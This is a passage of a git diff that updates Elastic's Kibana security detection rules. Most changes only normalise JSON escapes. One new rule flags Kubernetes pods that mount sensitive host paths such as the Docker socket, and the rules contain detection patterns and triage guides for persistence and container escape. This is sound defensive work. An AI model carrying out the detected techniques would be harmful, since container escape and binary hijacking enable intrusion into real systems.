\"start\" and\nprocess.name in (\"ssh\", \"sshd\") and process.args in (\"-X\", \"-Y\") and process.args_count \u003e= 3 and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and\nprocess.name in (\"ssh\", \"sshd\") and process.args in (\"-X\", \"-Y\") and process.args_count >= 3 and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", "references": [ "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" ], @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_1.json b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_1.json index 6d06f5e95cd..66776536ef3 100644 --- a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_1.json +++ b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_1.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_2.json b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_2.json index 4c0943fc4a1..ca6b19fafb6 100644 --- a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_2.json +++ b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_2.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_3.json b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_3.json index 3d74796b567..ab8e3a14a30 100644 --- a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_3.json +++ b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_3.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_4.json b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_4.json index 1c637d97366..2ee2f96974a 100644 --- a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_4.json +++ b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_4.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_5.json b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_5.json index a8a88d67e14..4f2195a2371 100644 --- a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_5.json +++ b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_5.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_201.json b/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_201.json index ea9f982c6d6..b73ec775f7a 100644 --- a/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_201.json +++ b/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_201.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_202.json b/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_202.json index a1ee2d9a123..ca3537ac5d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_202.json +++ b/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_202.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_203.json b/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_203.json new file mode 100644 index 00000000000..5914f0e5a08 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2abda169-416b-4bb3-9a6b-f8d239fd78ba_203.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects when a pod is created with a sensitive volume of type hostPath. A hostPath volume type mounts a sensitive file or folder from the node to the container. If the container gets compromised, the attacker can use this mount for gaining access to the node. There are many ways a container with unrestricted access to the host filesystem can escalate privileges, including reading data from other containers, and accessing tokens of more privileged pods.", + "false_positives": [ + "An administrator may need to attach a hostPath volume for a legitimate reason. This alert should be investigated for legitimacy by determining if the kuberenetes.audit.requestObject.spec.volumes.hostPath.path triggered is one needed by its target container/pod. For example, when the fleet managed elastic agent is deployed as a daemonset it creates several hostPath volume mounts, some of which are sensitive host directories like /proc, /etc/kubernetes, and /var/log. Add exceptions for trusted container images using the query field \"kubernetes.audit.requestObject.spec.container.image\"" + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Pod created with a Sensitive hostPath Volume", + "note": "", + "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.objectRef.resource:\"pods\"\n and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\")\n and kubernetes.audit.requestObject.spec.volumes.hostPath.path:\n (\"/\" or\n \"/proc\" or\n \"/root\" or\n \"/var\" or\n \"/var/run\" or\n \"/var/run/docker.sock\" or\n \"/var/run/crio/crio.sock\" or\n \"/var/run/cri-dockerd.sock\" or\n \"/var/lib/kubelet\" or\n \"/var/lib/kubelet/pki\" or\n \"/var/lib/docker/overlay2\" or\n \"/etc\" or\n \"/etc/kubernetes\" or\n \"/etc/kubernetes/manifests\" or\n \"/etc/kubernetes/pki\" or\n \"/home/admin\")\n and not kubernetes.audit.requestObject.spec.containers.image: (\"docker.elastic.co/beats/elastic-agent:8.4.0\")\n", + "references": [ + "https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216", + "https://kubernetes.io/docs/concepts/storage/volumes/#hostpath" + ], + "related_integrations": [ + { + "package": "kubernetes", + "version": "^1.4.1" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.containers.image", + "type": "text" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.volumes.hostPath.path", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2abda169-416b-4bb3-9a6b-f8d239fd78ba", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: Execution", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1610", + "name": "Deploy Container", + "reference": "https://attack.mitre.org/techniques/T1610/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 203 + }, + "id": "2abda169-416b-4bb3-9a6b-f8d239fd78ba_203", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_1.json b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_1.json index 260d1c5c664..4aec1a91f96 100644 --- a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_1.json +++ b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_1.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_2.json b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_2.json index 1da9c129a30..b643c30dc59 100644 --- a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_2.json +++ b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_2.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_3.json b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_3.json index 9da8b521395..579fd802323 100644 --- a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_3.json +++ b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_3.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_4.json b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_4.json index 5f7e5e65ba7..936b06ce14d 100644 --- a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_4.json +++ b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_4.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_5.json b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_5.json index 07f8146b511..1e2258496fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_5.json +++ b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_5.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_104.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_104.json index b0fe7971abf..edbf608b8aa 100644 --- a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adobe Hijack Persistence", - "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", "references": [ "https://twitter.com/pabraeken/status/997997818362155008" @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_105.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_105.json index f5c8b9bbe5d..08fd15c93da 100644 --- a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adobe Hijack Persistence", - "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", "references": [ "https://twitter.com/pabraeken/status/997997818362155008" @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_106.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_106.json index 69dcd329dbd..dd5023ff5ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adobe Hijack Persistence", - "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 